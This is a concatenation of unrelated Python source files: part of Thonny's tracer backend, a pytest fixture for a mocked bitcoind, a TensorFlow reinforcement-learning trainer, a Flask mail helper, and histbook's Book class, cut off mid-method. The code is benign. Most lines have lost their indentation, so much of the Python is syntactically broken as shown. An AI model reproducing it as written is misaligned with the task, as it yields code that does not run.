return ast.NodeTransformer.generic_visit(self, node)
elif tracer._should_instrument_as_expression(node):
# before marker
before_marker = tracer._create_simple_marker_call(
node, BEFORE_EXPRESSION_MARKER
)
ast.copy_location(before_marker, node)
if "ignore_children" in node.tags:
transformed_node = node
else:
transformed_node = ast.NodeTransformer.generic_visit(self, node)
# after marker
after_marker = ast.Call(
func=ast.Name(id=AFTER_EXPRESSION_MARKER, ctx=ast.Load()),
args=[before_marker, transformed_node],
keywords=[],
)
ast.copy_location(after_marker, node)
ast.fix_missing_locations(after_marker)
# further transformations may query original node location from after marker
if hasattr(node, "end_lineno"):
after_marker.end_lineno = node.end_lineno
after_marker.end_col_offset = node.end_col_offset
return after_marker
else:
# This expression (and its children) should be ignored
return node
else:
# Descend into statements
return ast.NodeTransformer.generic_visit(self, node)
return ExpressionVisitor().visit(node)
    def _create_simple_marker_call(self, node, fun_name, extra_args=()):
        args = [self._export_node(node)] + list(extra_args)
return ast.Call(func=ast.Name(id=fun_name, ctx=ast.Load()), args=args, keywords=[])
def _export_node(self, node):
assert isinstance(node, (ast.expr, ast.stmt))
node_id = id(node)
self._nodes[node_id] = node
return ast.Num(node_id)
def _debug(self, *args):
logger.debug("TRACER: " + str(args))
def _execute_prepared_user_code(self, statements, expression, global_vars):
try:
return Tracer._execute_prepared_user_code(self, statements, expression, global_vars)
finally:
"""
from thonny.misc_utils import _win_get_used_memory
print("Memory:", _win_get_used_memory() / 1024 / 1024)
print("States:", len(self._saved_states))
print(self._fulltags.most_common())
"""
class CustomStackFrame:
def __init__(self, frame, event, focus=None):
self.system_frame = frame
self.event = event
self.focus = focus
self.current_evaluations = []
self.current_statement = None
self.current_root_expression = None
self.node_tags = set()
class FancySourceFileLoader(SourceFileLoader):
"""Used for loading and instrumenting user modules during fancy tracing"""
def __init__(self, fullname, path, tracer):
super().__init__(fullname, path)
self._tracer = tracer
def source_to_code(self, data, path, *, _optimize=-1):
old_tracer = sys.gettrace()
sys.settrace(None)
try:
root = self._tracer._prepare_ast(data, path, "exec")
return super().source_to_code(root, path)
finally:
sys.settrace(old_tracer)
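# Editor's sketch (standalone illustration, not used by Thonny): the import-hook
# pattern behind NiceTracer.find_spec / FancySourceFileLoader in its smallest form --
# a meta_path finder that delegates to PathFinder and swaps in a SourceFileLoader
# subclass for modules it wants to instrument.  Activating it would require
# sys.meta_path.insert(0, _SketchFinder()), which this module deliberately never does.
class _SketchLoggingLoader(SourceFileLoader):
    def source_to_code(self, data, path, *, _optimize=-1):
        print("compiling", path)  # a real hook would rewrite `data` here
        return super().source_to_code(data, path, _optimize=_optimize)
class _SketchFinder:
    def find_spec(self, fullname, path=None, target=None):
        spec = PathFinder.find_spec(fullname, path, target)
        if spec is not None and isinstance(spec.loader, SourceFileLoader):
            spec.loader = _SketchLoggingLoader(fullname, spec.origin)
        return spec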
def _get_frame_prefix(frame):
return str(id(frame)) + " " + ">" * len(inspect.getouterframes(frame, 0)) + " "
def _get_python_version_string(add_word_size=False):
result = ".".join(map(str, sys.version_info[:3]))
if sys.version_info[3] != "final":
result += "-" + sys.version_info[3]
if add_word_size:
result += " (" + ("64" if sys.maxsize > 2 ** 32 else "32") + " bit)"
return result
def _fetch_frame_source_info(frame):
if frame.f_code.co_filename is None or not os.path.exists(frame.f_code.co_filename):
return None, None, True
is_libra = _is_library_file(frame.f_code.co_filename)
if frame.f_code.co_name == "<module>":
# inspect.getsource and getsourcelines don't help here
with tokenize.open(frame.f_code.co_filename) as fp:
return fp.read(), 1, is_libra
else:
# function or class
try:
source = inspect.getsource(frame.f_code)
# inspect.getsource is not reliable, see eg:
# https://bugs.python.org/issue35101
# If the code name is not present as definition
# in the beginning of the source,
# then play safe and return the whole script
first_line = source.splitlines()[0]
if re.search(r"\b(class|def)\b\s+\b%s\b" % frame.f_code.co_name, first_line) is None:
with tokenize.open(frame.f_code.co_filename) as fp:
return fp.read(), 1, is_libra
else:
return source, frame.f_code.co_firstlineno, is_libra
except OSError:
logger.exception("Problem getting source")
return None, None, True
def format_exception_with_frame_info(e_type, e_value, e_traceback, shorten_filenames=False):
"""Need to suppress thonny frames to avoid confusion"""
_traceback_message = "Traceback (most recent call last):\n"
_cause_message = getattr(
traceback,
"_cause_message",
("\nThe above exception was the direct cause " + "of the following exception:") + "\n\n",
)
_context_message = getattr(
traceback,
"_context_message",
("\nDuring handling of the above exception, " + "another exception occurred:") + "\n\n",
)
def rec_format_exception_with_frame_info(etype, value, tb, chain=True):
# Based on
# https://www.python.org/dev/peps/pep-3134/#enhanced-reporting
# and traceback.format_exception
if etype is None:
etype = type(value)
if tb is None:
tb = value.__traceback__
if chain:
if value.__cause__ is not None:
yield from rec_format_exception_with_frame_info(None, value.__cause__, None)
yield (_cause_message, None, None, None)
elif value.__context__ is not None and not value.__suppress_context__:
yield from rec_format_exception_with_frame_info(None, value.__context__, None)
yield (_context_message, None, None, None)
if tb is not None:
yield (_traceback_message, None, None, None)
have_seen_first_relevant_frame = False
tb_temp = tb
for entry in traceback.extract_tb(tb):
assert tb_temp is not None # actual tb doesn't end before extract_tb
if (
"thonny/backend" not in entry.filename
and "thonny\\backend" not in entry.filename
and (
not entry.filename.endswith(os.sep + "ast.py")
or entry.name != "parse"
or etype is not SyntaxError
)
or (
have_seen_first_relevant_frame
and not (issubclass(etype, ImportError) and entry.name == "_custom_import")
)
or in_debug_mode()
):
have_seen_first_relevant_frame = True
fmt = ' File "{}", line {}, in {}\n'.format(
entry.filename, entry.lineno, entry.name
)
if entry.line:
fmt += " {}\n".format(entry.line.strip())
yield (fmt, id(tb_temp.tb_frame), entry.filename, entry.lineno)
tb_temp = tb_temp.tb_next
assert tb_temp is None # tb was exhausted
for line in traceback.format_exception_only(etype, value):
if etype is SyntaxError and line.endswith("^\n"):
# for some reason it may add several empty lines before ^-line
partlines = line.splitlines()
while len(partlines) >= 2 and partlines[-2].strip() == "":
del partlines[-2]
line = "\n".join(partlines) + "\n"
yield (line, None, None, None)
items = rec_format_exception_with_frame_info(e_type, e_value, e_traceback)
return list(items)
def in_debug_mode():
return os.environ.get("THONNY_DEBUG", False) in [1, "1", True, "True", "true"]
def _is_library_file(filename):
return (
filename is None
or path_startswith(filename, sys.prefix)
or hasattr(sys, "base_prefix")
and path_startswith(filename, sys.base_prefix)
or hasattr(sys, "real_prefix")
and path_startswith(filename, getattr(sys, "real_prefix"))
or site.ENABLE_USER_SITE
and path_startswith(filename, site.getusersitepackages())
)
def _report_internal_error():
print("PROBLEM WITH THONNY'S BACK-END:\n", file=sys.stderr)
traceback.print_exc()
def get_vm():
return _vm
|
conftest.py
|
import pytest
from time import sleep
from threading import Thread
import bitcoind_mock.conf as conf
from bitcoind_mock.bitcoind import BitcoindMock
from bitcoind_mock.auth_proxy import AuthServiceProxy
def bitcoin_cli():
return AuthServiceProxy(
"http://%s:%s@%s:%d" % (conf.BTC_RPC_USER, conf.BTC_RPC_PASSWD, conf.BTC_RPC_HOST, conf.BTC_RPC_PORT)
)
@pytest.fixture(scope="module")
def run_bitcoind():
bitcoind_thread = Thread(target=BitcoindMock().run, kwargs={"mode": "event"})
bitcoind_thread.daemon = True
bitcoind_thread.start()
# It takes a little bit of time to start the API (otherwise the requests are sent too early and they fail)
sleep(0.1)
@pytest.fixture(scope="module")
def genesis_block_hash(run_bitcoind):
return bitcoin_cli().getblockhash(0)
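# Editor's sketch (not part of the original conftest): a test module consumes these
# fixtures simply by naming them as parameters; pytest starts the mock once per module
# and hands the captured genesis hash to each test.  The assertion assumes the mock
# keeps the genesis hash stable across calls, which is the expected behaviour:
def _example_test_genesis_hash_is_stable(run_bitcoind, genesis_block_hash):
    assert bitcoin_cli().getblockhash(0) == genesis_block_hash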
|
main.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import threading
import signal
import math
import os
import time
from environment.environment import Environment
from model.model import UnrealModel
from train.trainer import Trainer
from train.rmsprop_applier import RMSPropApplier
from options import get_options
USE_GPU = True # To use GPU, set True
# get command line args
flags = get_options("training")
def log_uniform(lo, hi, rate):
log_lo = math.log(lo)
log_hi = math.log(hi)
v = log_lo * (1-rate) + log_hi * rate
return math.exp(v)
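# Editor's note (illustration, not used by the trainer): log_uniform interpolates in
# log space, so rate=0.5 yields the geometric mean of lo and hi.
def _log_uniform_example():
  assert math.isclose(log_uniform(1e-4, 1e-2, 0.5), 1e-3)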
class Application(object):
def __init__(self):
pass
def train_function(self, parallel_index, preparing):
""" Train each environment. """
trainer = self.trainers[parallel_index]
if preparing:
trainer.prepare()
# set start_time
trainer.set_start_time(self.start_time)
while True:
if self.stop_requested:
break
      if self.terminate_requested:
trainer.stop()
break
if self.global_t > flags.max_time_step:
trainer.stop()
break
if parallel_index == 0 and self.global_t > self.next_save_steps:
# Save checkpoint
self.save()
diff_global_t = trainer.process(self.sess,
self.global_t,
self.summary_writer,
self.summary_op,
self.score_input)
self.global_t += diff_global_t
def run(self):
device = "/cpu:0"
if USE_GPU:
device = "/gpu:0"
initial_learning_rate = log_uniform(flags.initial_alpha_low,
flags.initial_alpha_high,
flags.initial_alpha_log_rate)
self.global_t = 0
self.stop_requested = False
    self.terminate_requested = False
action_size = Environment.get_action_size(flags.env_type,
flags.env_name)
self.global_network = UnrealModel(action_size,
-1,
flags.use_pixel_change,
flags.use_value_replay,
flags.use_reward_prediction,
flags.pixel_change_lambda,
flags.entropy_beta,
device)
self.trainers = []
learning_rate_input = tf.placeholder("float")
grad_applier = RMSPropApplier(learning_rate = learning_rate_input,
decay = flags.rmsp_alpha,
momentum = 0.0,
epsilon = flags.rmsp_epsilon,
clip_norm = flags.grad_norm_clip,
device = device)
for i in range(flags.parallel_size):
trainer = Trainer(i,
self.global_network,
initial_learning_rate,
learning_rate_input,
grad_applier,
flags.env_type,
flags.env_name,
flags.use_pixel_change,
flags.use_value_replay,
flags.use_reward_prediction,
flags.pixel_change_lambda,
flags.entropy_beta,
flags.local_t_max,
flags.gamma,
flags.gamma_pc,
flags.experience_history_size,
flags.max_time_step,
device)
self.trainers.append(trainer)
# prepare session
config = tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True)
config.gpu_options.allow_growth = True
self.sess = tf.Session(config=config)
self.sess.run(tf.global_variables_initializer())
# summary for tensorboard
self.score_input = tf.placeholder(tf.int32)
tf.summary.scalar("score", self.score_input)
self.summary_op = tf.summary.merge_all()
self.summary_writer = tf.summary.FileWriter(flags.log_file,
self.sess.graph)
# init or load checkpoint with saver
self.saver = tf.train.Saver(self.global_network.get_vars())
checkpoint = tf.train.get_checkpoint_state(flags.checkpoint_dir)
if checkpoint and checkpoint.model_checkpoint_path:
self.saver.restore(self.sess, checkpoint.model_checkpoint_path)
print("checkpoint loaded:", checkpoint.model_checkpoint_path)
tokens = checkpoint.model_checkpoint_path.split("-")
# set global step
self.global_t = int(tokens[1])
print(">>> global step set: ", self.global_t)
# set wall time
wall_t_fname = flags.checkpoint_dir + '/' + 'wall_t.' + str(self.global_t)
with open(wall_t_fname, 'r') as f:
self.wall_t = float(f.read())
self.next_save_steps = (self.global_t + flags.save_interval_step) // flags.save_interval_step * flags.save_interval_step
else:
print("Could not find old checkpoint")
# set wall time
self.wall_t = 0.0
self.next_save_steps = flags.save_interval_step
# run training threads
self.train_threads = []
for i in range(flags.parallel_size):
self.train_threads.append(threading.Thread(target=self.train_function, args=(i,True)))
signal.signal(signal.SIGINT, self.signal_handler)
# set start time
self.start_time = time.time() - self.wall_t
for t in self.train_threads:
t.start()
print('Press Ctrl+C to stop')
signal.pause()
def save(self):
""" Save checkpoint.
    Called from thread-0.
"""
self.stop_requested = True
# Wait for all other threads to stop
for (i, t) in enumerate(self.train_threads):
if i != 0:
t.join()
# Save
if not os.path.exists(flags.checkpoint_dir):
os.mkdir(flags.checkpoint_dir)
# Write wall time
wall_t = time.time() - self.start_time
wall_t_fname = flags.checkpoint_dir + '/' + 'wall_t.' + str(self.global_t)
with open(wall_t_fname, 'w') as f:
f.write(str(wall_t))
print('Start saving.')
self.saver.save(self.sess,
flags.checkpoint_dir + '/' + 'checkpoint',
global_step = self.global_t)
print('End saving.')
self.stop_requested = False
self.next_save_steps += flags.save_interval_step
# Restart other threads
for i in range(flags.parallel_size):
if i != 0:
thread = threading.Thread(target=self.train_function, args=(i,False))
self.train_threads[i] = thread
thread.start()
def signal_handler(self, signal, frame):
print('You pressed Ctrl+C!')
    self.terminate_requested = True
def main(argv):
app = Application()
app.run()
if __name__ == '__main__':
tf.app.run()
|
email.py
|
from flask import current_app,render_template
from flask_mail import Mail,Message
import threading
from .extensions import mail
def async_send_mail(app,msg):
with app.app_context():
mail.send(msg)
# Send an email
def send_mail(subject,to,temname,**kwargs):
    app = current_app._get_current_object()  # get the real app instance behind the current_app proxy
msg = Message(subject=subject,recipients=[to],sender=current_app.config['MAIL_USERNAME'])
msg.html = render_template('email/'+temname+'.html',**kwargs)
t = threading.Thread(target=async_send_mail,args=(app,msg))
t.start()
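# Editor's sketch (not part of the original module): a view would call send_mail from
# inside an application/request context with the template name and the variables that
# template expects; the subject, template name ("activate") and token variable below
# are assumptions for illustration only.
def _example_send_activation(user_email, token):
    send_mail("Activate your account", user_email, "activate", token=token)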
|
book.py
|
#!/usr/bin/env python
# Copyright (c) 2018, DIANA-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import collections
import fnmatch
import functools
import sys
import threading
import numpy
import histbook.calc.spark
import histbook.fill
import histbook.hist
import histbook.util
if sys.version_info[0] <= 2:
string = basestring
else:
string = str
################################################################ superclass of all books (glorified dict)
class GenericBook(collections.MutableMapping):
"""
A generic collection of histograms (:py:class:`Hist <histbook.hist.Hist>`) or other ``Books``.
This generic superclass can't be filled; for a fillable book, use :py:class:`Book <histbook.book.Book>`.
Behaves like a dict (item assignment, ``keys``, ``values``).
"""
def __init__(self, hists1={}, *hists2, **hists3):
u"""
Positional arguments may be a dict of str \u2192 :py:class:`Hist <histbook.hist.Hist>` or :py:class:`GenericBook <histbook.book.GenericBook>`.
Or they may be :py:class:`Hist <histbook.hist.Hist>` or :py:class:`GenericBook <histbook.book.GenericBook>` as unnamed varargs.
In either case, keyword name \u2192 :py:class:`Hist <histbook.hist.Hist>` or :py:class:`Book <histbook.book.Book>` are also accepted.
"""
self._content = collections.OrderedDict()
self._attachment = {}
if isinstance(hists1, dict):
for n, x in hists1.items():
self[n] = x
if len(hists2) != 0:
raise TypeError("only one positional argument when the first argument is a dict")
elif isinstance(hists1, (histbook.hist.Hist, GenericBook)):
self["0"] = hists1
for i, x in enumerate(hists2):
self[str(i + 1)] = x
else:
raise TypeError("positional arguments may be a single dict or varargs of unnamed histograms/books")
for n, x in hists3.items():
self[n] = x
self._changed()
def _changed(self):
pass
@classmethod
def fromdicts(cls, content, attachment):
"""Construct a book from its ``content`` and ``attachment`` dicts."""
out = cls.__new__(cls)
out._content = collections.OrderedDict()
out._attachment = attachment
for n, x in content.items():
out[n] = x
out._changed()
return out
def attach(self, key, value):
"""Add an attachment to the book (changing it in-place and returning it)."""
self._attachment[key] = value
return self
def detach(self, key):
"""Remove an attachment from the book (changing it in-place and returning it)."""
del self._attachment[key]
return self
def has(self, key):
"""Returns ``True`` if ``key`` exists in the attachment metadata."""
return key in self._attachment
def get(self, key, *default):
"""
Get an item of attachment metadata.
If ``key`` isn't found and no ``default`` is specified, raise a ``KeyError``.
If ``key`` isn't found and a ``default`` is provided, return the ``default`` instead.
Only one ``default`` is allowed.
"""
if len(default) == 0:
return self._attachment[key]
elif len(default) == 1:
return self._attachment.get(key, default[0])
else:
raise TypeError("get takes 1 or 2 arguments; {0} provided".format(len(default) + 1))
@property
def attachment(self):
"""Python dict of attachment metadata (linked, not a copy)."""
return self._attachment
def __repr__(self):
return "<{0} ({1} content{2}{3}) at {4:012x}>".format(self.__class__.__name__, len(self), "" if len(self) == 1 else "s", "" if len(self._attachment) == 0 else " {0} attachment{1}".format(len(self._attachment), "" if len(self._attachment) == 1 else "s"), id(self))
def __str__(self, indent=",\n ", first=True):
return self.__class__.__name__ + "({" + (indent.replace(",", "") if first else "") + indent.join("{0}: {1}".format(repr(n), x.__str__(indent + " " if isinstance(x, GenericBook) else ", ", True)) for n, x in self.iteritems()) + (indent.replace(",", "") if first else "") + "})"
def __eq__(self, other):
return self.__class__ is other.__class__ and self._content == other._content and self._attachment == other._attachment
def __ne__(self, other):
return not self.__eq__(other)
def compatible(self, other):
"""Returns True if the books have the same set of histogram names and those histograms with matching names are compatible."""
return set(self.iterkeys()) == set(other.iterkeys()) and all(self[n].compatible(other[n]) for n in self.iterkeys())
def assertcompatible(self):
"""Raises ``ValueError`` if not all books have the same set of histogram names and those histograms with matching names are compatible."""
def recurse(path, one, two):
if isinstance(one, GenericBook) and one.__class__ is two.__class__:
if set(one.iterkeys()) != set(two.iterkeys()):
raise ValueError("key names at {0} are not compatible (same book types, names, and non-profile axis binning):\n\n {1}\n\nversus\n\n {2}\n".format(repr(path), sorted(one.iterkeys()), sorted(two.iterkeys())))
else:
for n in one.iterkeys():
recurse(path + "/" + n, one[n], two[n])
elif isinstance(one, histbook.hist.Hist) and isinstance(two, histbook.hist.Hist):
if not one.compatible(two):
raise ValueError("histograms at {0} are not compatible (same book types, names, and non-profile axis binning):\n\n {1}\n\nversus\n\n {2}\n".format(repr(path), repr(one), repr(two)))
else:
raise ValueError("histograms at {0} are not compatible (same book types, names, and non-profile axis binning):\n\n {1}\n\nversus\n\n {2}\n".format(repr(path), repr(type(one)), repr(type(two))))
if len(self._content) >= 2:
items = list(self._content.items())
for (n1, x1), (n2, x2) in zip(items[:-1], items[1:]):
recurse("{" + n1 + "," + n2 + "}", x1, x2)
def tojson(self):
def merge(name, node):
node["name"] = name
return node
out = {"type": self.__class__.__name__, "content": [merge(n, x.tojson()) for n, x in self._content.items()]}
if len(self._attachment) != 0:
out["attachment"] = self._attachment
return out
@staticmethod
def fromjson(obj):
cls = getattr(sys.modules[GenericBook.__module__], obj["type"])
content = collections.OrderedDict()
for node in obj["content"]:
if node["type"] == "Hist":
content[node["name"]] = histbook.hist.Hist.fromjson(node)
else:
content[node["name"]] = GenericBook.fromjson(node)
return cls.fromdicts(content, obj.get("attachment", {}))
def __len__(self):
return len(self._content)
def __contains__(self, name):
try:
self[name]
except KeyError:
return False
else:
return True
def _get(self, name):
attempt = self._content.get(name, None)
if attempt is not None:
return attempt
else:
try:
slash = name.index("/")
except ValueError:
pass
else:
attempt = self._content.get(name[:slash], None)
if isinstance(attempt, GenericBook):
return attempt._get(name[slash + 1:])
return None
def _set(self, name, value, path):
try:
slash = name.index("/")
except ValueError:
self._content[name] = value
self._changed()
else:
attempt = self._content.get(name[:slash], None)
if attempt is None:
attempt = self._content[name[:slash]] = Book()
if isinstance(attempt, GenericBook):
attempt._set(name[slash + 1:], value, path + "/" + name[:slash])
self._changed()
else:
raise KeyError("value at {0} is a Hist, not a book".format(repr(path)))
def _del(self, name, path):
if name in self._content:
del self._content[name]
self._changed()
else:
try:
slash = name.index("/")
except ValueError:
raise KeyError("could not find {0}".format(name if path == "" else path + "/" + name))
else:
attempt = self._content.get(name[:slash], None)
if isinstance(attempt, GenericBook):
attempt._del(name[slash + 1:], path + "/" + name[:slash])
self._changed()
else:
raise KeyError("could not find {0}".format(name if path == "" else path + "/" + name))
def __getitem__(self, name):
if not isinstance(name, string):
raise TypeError("keys of a {0} must be strings".format(self.__class__.__name__))
if "*" in name or "?" in name or "[" in name:
return [x for n, x in self.iteritems(recursive=True) if fnmatch.fnmatchcase(n, name)]
else:
out = self._get(name)
if out is not None:
return out
else:
raise KeyError("could not find {0} and could not interpret it as a wildcard (glob) pattern".format(repr(name)))
def __setitem__(self, name, value):
if not isinstance(name, string):
raise TypeError("keys of a {0} must be strings".format(self.__class__.__name__))
if not isinstance(value, (histbook.hist.Hist, GenericBook)):
raise TypeError("values of a {0} must be Hists or books".format(self.__class__.__name__))
self._set(name, value, "")
def __delitem__(self, name):
if not isinstance(name, string):
raise TypeError("keys of a {0} must be strings".format(self.__class__.__name__))
if "*" in name or "?" in name or "[" in name:
for n in self.allkeys():
    if fnmatch.fnmatchcase(n, name):
        self._del(n, "")
else:
self._del(name, "")
def _iteritems(self, path, recursive, onlyhist):
for n, x in self._content.items():
if not onlyhist or isinstance(x, histbook.hist.Hist):
yield (n if path is None else path + "/" + n), x
if recursive and isinstance(x, GenericBook):
for y in x._iteritems((n if path is None else path + "/" + n), recursive, onlyhist):
yield y
def iteritems(self, recursive=False, onlyhist=False):
"""
Iterate through path, book-or-histogram pairs.
Parameters
----------
recursive : bool
if ``True`` *(not default)*, descend into books of books
onlyhist : bool
if ``True`` *(not default)*, only return histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
for n, x in self._iteritems(None, recursive, onlyhist):
yield n, x
def iterkeys(self, recursive=False, onlyhist=False):
"""
Iterate through paths.
Parameters
----------
recursive : bool
if ``True`` *(not default)*, descend into books of books
onlyhist : bool
if ``True`` *(not default)*, only return names of histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
for n, x in self.iteritems(recursive=recursive, onlyhist=onlyhist):
yield n
def itervalues(self, recursive=False, onlyhist=False):
"""
Iterate through books and histograms.
Parameters
----------
recursive : bool
if ``True`` *(not default)*, descend into books of books
onlyhist : bool
if ``True`` *(not default)*, only return histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
for n, x in self.iteritems(recursive=recursive, onlyhist=onlyhist):
yield x
def items(self, recursive=False, onlyhist=False):
"""
Return a list of path, book-or-histogram pairs.
Parameters
----------
recursive : bool
if ``True`` *(not default)*, descend into books of books
onlyhist : bool
if ``True`` *(not default)*, only return histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
return list(self.iteritems(recursive=recursive, onlyhist=onlyhist))
def keys(self, recursive=False, onlyhist=False):
"""
Return a list of paths.
Parameters
----------
recursive : bool
if ``True`` *(not default)*, descend into books of books
onlyhist : bool
if ``True`` *(not default)*, only return names of histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
return list(self.iterkeys(recursive=recursive, onlyhist=onlyhist))
def values(self, recursive=False, onlyhist=False):
"""
Return a list of books and histograms.
Parameters
----------
recursive : bool
if ``True`` *(not default)*, descend into books of books
onlyhist : bool
if ``True`` *(not default)*, only return histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
return list(self.itervalues(recursive=recursive, onlyhist=onlyhist))
def allitems(self, onlyhist=False):
"""
Return a recursive list of path, book-or-histogram pairs.
Parameters
----------
onlyhist : bool
if ``True`` *(not default)*, only return histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
return self.items(recursive=True, onlyhist=onlyhist)
def allkeys(self, onlyhist=False):
"""
Return a recursive list of paths.
Parameters
----------
onlyhist : bool
if ``True`` *(not default)*, only return names of histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
return self.keys(recursive=True, onlyhist=onlyhist)
def allvalues(self, onlyhist=False):
"""
Return a recursive list of books and histograms.
Parameters
----------
onlyhist : bool
if ``True`` *(not default)*, only return histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
return self.values(recursive=True, onlyhist=onlyhist)
def __iter__(self):
"""Same as ``iteritems(recursive=True, onlyhist=True)``."""
return self.iteritems(recursive=True, onlyhist=True)
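# Commented lookup/iteration sketch (illustrative only; 'book' stands for any
# GenericBook instance). Exact paths descend through nested books, glob
# patterns go through fnmatch and return a list, and the iterators only walk
# the nesting when recursive=True:
#
#     book["jets/pt"]      # exact path lookup, descending into sub-books
#     book["*/pt"]         # glob pattern -> list of everything whose path matches
#     for path, h in book.iteritems(recursive=True, onlyhist=True):
#         pass             # every histogram, keyed by its full "a/b/c" path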
def copy(self):
"""Return an immediate copy of the book of histograms."""
return self.__class__.fromdicts(collections.OrderedDict((n, x.copy()) for n, x in self.items()), dict(self._attachment))
def copyonfill(self):
"""Return a copy of the book of histograms whose content is copied if filled."""
return self.__class__.fromdicts(collections.OrderedDict((n, x.copyonfill()) for n, x in self.items()), dict(self._attachment))
def clear(self):
"""Effectively reset all bins of all histograms to zero."""
for x in self.itervalues(recursive=True, onlyhist=True):
x.clear()
def cleared(self):
"""Return a copy with all bins of all histograms set to zero."""
return self.__class__.fromdicts(collections.OrderedDict((n, x.cleared()) for n, x in self.items()), dict(self._attachment))
def __add__(self, other):
if not isinstance(other, GenericBook):
raise TypeError("histogram books can only be added to other histogram books")
content = collections.OrderedDict()
for n, x in self.iteritems():
if n in other:
content[n] = x + other[n]
else:
content[n] = x
for n, x in other.iteritems():
if n not in self:
content[n] = x
attachment = dict(self._attachment)
attachment.update(other._attachment)
return self.__class__.fromdicts(content, attachment)
def __iadd__(self, other):
if not isinstance(other, GenericBook):
raise TypeError("histogram books can only be added to other histogram books")
for n, x in other.iteritems():
if n not in self:
self[n] = x
else:
self[n] += x
return self
def __mul__(self, value):
content = collections.OrderedDict()
for n, x in self.iteritems():
content[n] = x.__mul__(value)
return self.__class__.fromdicts(content, dict(self._attachment))
def __rmul__(self, value):
return self.__mul__(value)
def __imul__(self, value):
for x in self.itervalues():
x.__imul__(value)
return self
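# Commented arithmetic sketch (illustrative only; book_a and book_b stand for
# any two compatible books): ``+`` merges two books, summing histograms that
# share a path and keeping the rest, while ``*`` scales every histogram:
#
#     merged = book_a + book_b     # union of paths; shared paths are summed
#     book_a += book_b             # in-place variant
#     scaled = 2.0 * book_a        # same as book_a * 2.0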
@classmethod
def group(cls, by="source", **books):
"""
Combine histograms, maintaining their distinctiveness by adding a new categorical axis to each.
To combine histograms by adding bins, just use the ``+`` operator.
Parameters
----------
by : string
name of the new axis (must not already exist)
**books : :py:class:`Book <histbook.book.Book>`
books to combine (histograms with the same names must have the same axes)
"""
if any(not isinstance(x, GenericBook) for x in books.values()):
raise TypeError("only histogram books can be grouped with other books")
content = collections.OrderedDict()
for name in functools.reduce(set.union, (set(book.iterkeys()) for book in books.values())):
nestcls = tuple(set(book[name].__class__ for book in books.values() if name in book))
if len(nestcls) != 1:
raise TypeError("books at {0} have different types: {1}".format(repr(name), ", ".join(repr(x) for x in nestcls)))
content[name] = nestcls[0].group(by=by, **dict((n, book[name]) for n, book in books.items() if name in book))
attachment = {}
for book in books.values():
attachment.update(book._attachment)
return cls.fromdicts(content, attachment)
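# Commented grouping sketch (illustrative only; data_book and mc_book stand
# for two books with the same histogram names and axes): ``group`` keeps the
# inputs distinct by adding a new categorical axis instead of summing bins:
#
#     combined = Book.group(by="source", data=data_book, mc=mc_book)
#     # combined["pt"] now carries a "source" axis with categories "data" and "mc"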
################################################################ user-level Book (in the histbook.* namespace)
class Book(GenericBook, histbook.fill.Fillable):
"""
A collection of histograms (:py:class:`Hist <histbook.hist.Hist>`) or other ``Books`` that can be filled with a single ``fill`` call.
Behaves like a dict (item assignment, ``keys``, ``values``).
"""
def __str__(self, indent=",\n ", first=False):
return super(Book, self).__str__(indent=indent, first=first)
def _changed(self):
self._fields = None
@property
def _goals(self):
return functools.reduce(set.union, (x._goals for x in self.itervalues(recursive=True, onlyhist=True)))
def _streamline(self, i, instructions):
self._destination = []
for i, x in enumerate(self.itervalues(recursive=True, onlyhist=True)):
self._destination.append(x._destination[0])
x._streamline(i, instructions)
return instructions
def fill(self, arrays=None, **more):
u"""
Fill the histograms: identify bins for independent variables, increase their counts by ``1`` or ``weight``, and increment any profile (dependent variable) means and errors in the means.
All arrays must have the same length (one-dimensional shape). Numbers are treated as one-element arrays.
All histograms in the book are filled with the same inputs.
Parameters
----------
arrays : dict \u2192 Numpy array or number; Spark DataFrame; Pandas DataFrame
field values to use in the calculation of independent and dependent variables (axes)
**more : Numpy arrays or numbers
more field values
"""
if histbook.calc.spark.isspark(arrays, more):
# pyspark.DataFrame
threads = [threading.Thread(target=histbook.calc.spark.fillspark(x, arrays)) for x in self.itervalues(recursive=True, onlyhist=True)]
for x in self.itervalues(recursive=True, onlyhist=True):
x._prefill()
for x in threads:
x.start()
for x in threads:
x.join()
elif arrays.__class__.__name__ == "DataFrame" and arrays.__class__.__module__ == "pandas.core.frame":
# pandas.DataFrame
if len(more) > 0:
raise TypeError("if arrays is a Pandas DataFrame, keyword arguments are not allowed")
self.fill(dict((n, arrays[n].values) for n in arrays.columns))
else:
# dict-like of numpy.ndarray (or castable)
